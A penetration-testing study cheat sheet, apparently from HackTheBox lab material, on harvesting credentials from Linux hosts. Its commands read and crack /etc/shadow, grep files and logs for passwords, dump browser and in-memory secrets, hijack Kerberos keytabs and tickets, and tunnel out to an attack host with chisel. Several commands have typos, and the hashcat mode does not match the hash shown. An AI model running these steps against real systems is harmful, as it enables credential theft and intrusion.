PAM, passwd, and shadow

The most commonly used Linux authentication method is the Pluggable Authentication Module (PAM). The modules responsible for this functionality are pam_unix.so and pam_unix2.so in /usr/lib/x86_64-linux-gnu/security.

PAM standardized API calls from the system libraries to update account information. It reads and writes to /etc/passwd and /etc/shadow.

The /etc/passwdfile contains information about every user on the system and is readable by all users. It stores seven fields:

htb-student:x:1000:1000:,,,:/home/htb-student:/bin/bash
FieldValue
Usernamehtb-student
Passwordx
User ID1000
Group ID1000
GECOS,,,
Home directory/home/htb-student
Default shell/bin/bash

On modern systems the password hashes are stored in /etc/shadow. This new file is only readable by users with administrative privileges. It contains nine fields:

htb-student:$y$j9T$3QSBB6CbHEu...SNIP...f8Ms:18955:0:99999:7:::
FieldValue
Usernamehtb-student
Password$y$j9T$3QSBB6CbHEu...SNIP...f8Ms
Last change18955
Min age0
Max age99999
Warning period7
Inactivity period-
Expiration date-
Reserved field-

If the Password field contains ! or * the user cannot log in using a Unix password, other methods like Kerberos or key-based authentication must be used.

The field itself is split into 3 parts $<id>$<salt>$<hashed>. ID value corresponding to the hashing algorithm used.

PAM library also prevents users from using old passwords via the /etc/security/opasswd file that contains old passwords.

Crack Local Password Hashes

Once root access on a Linux machine is achieved.

# coppy the password files
sudo cp /etc/passwd /tmp/passwd.bak 
sudo cp /etc/shadow /tmp/shadow.bak 
 
# combine the passwd and shadow files into single file for cracking
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes
 
# crack the file
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked

Configuration and Database Hunting

# Search for configuration files
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
 
# output the contents
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
 
# search for databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done

Notes, Scripts, Cron, and Logs

# searching for notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"
 
# searching for scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
 
# searching for cronjobs
cat /etc/crontab 
ls -la /etc/cron.*/
 
# enumerating history files
tail -n5 /home/*/.bash*
 
# log files
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done

Credential Dumping and Browser Credentials

# find credentials stored in memory or files
sudo python3 mimipenguin.py
# or
sudo python2.7 laZagne.py all
 
# find browser credentials
ls -l .mozilla/firefox/ | grep default 
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
# or
python3.9 firefox_decrypt.py

Linux Kerberos and Keytabs

Linux computer can connect to Active Directory, commonly using Kerberos as authentication.

Linux uses the same process as Windows to request a TGT and TGS but store the ticket information differently. They are usually stored in ccache files in the tmp /tmp directory. The location of the ticket is stored in the KRB5CCNAME environment variable. These files are protected by read/write permissions but a user with elevated permissions can gain access.

Another use of Kerberos in Linux is with keytab files, which contains pairs of Kerberos principals and encrypted keys. This file is used to authenticate to rmeote systems with Kerberos without entering a password.

# verify the machine is domain-joined
realm list
# or
ps -ef | grep -i "winbind\|sssd"
 
# find keytab files
find / -name *keytab* -ls 2>/dev/null
 
# find keytab files via cronjobs
crontab -l
 
# list keytab info
klist -k -t /opt/specialfiles/carlos.keytab 
 
# impersonate keytab
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
 
# extract keytab secrets
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab 
 
# verify current ticket
klist
 
# find ccache files in environment variables
env | grep -i krb5
# or
ls -la /tmp
 
# identify group membership
id julio@inlanefreight.htb
 
# import ccache file into our current session
export KRB5CCNAME=/root/krb5cc_647401106_I8I133
 
# connect to a share as current user
smbclient //dc01/carlos -k -c ls

Use Kerberos from Attack Host

If we are attacking from a non-domain joined machine we must manually specify the KDC/Domain Controller. To use Kerberos, we need to proxy our traffic.

# hardcode IP address of the domain
cat /etc/hosts
 
# edit proxychains
cat /etc/proxychains.conf
 
# execute chisel from attack host
sudo ./chisel server --reverse 
 
# execute chisel from a compromised host
chisel.exe client 10.10.14.33:8080 R:socks
 
# set KRB5CCNAME env variable
export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133
 
# proxychainms and Kerberos authentication
proxychains impacket-wmiexec dc01 -k
 
# winRM
## Edit the kerberos config file to use proper domain
cat /etc/krb5.conf
 
# evilwinrm with kerberos
proxychains evil-winrm -i dc01 -r inlanefreight.htb
 
# to convert a .ccache file into a windows compatible kirbi file
impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi 
 
# on a domain joined machine we can run liniktaz to extract extract all credentials
/opt/linikatz.sh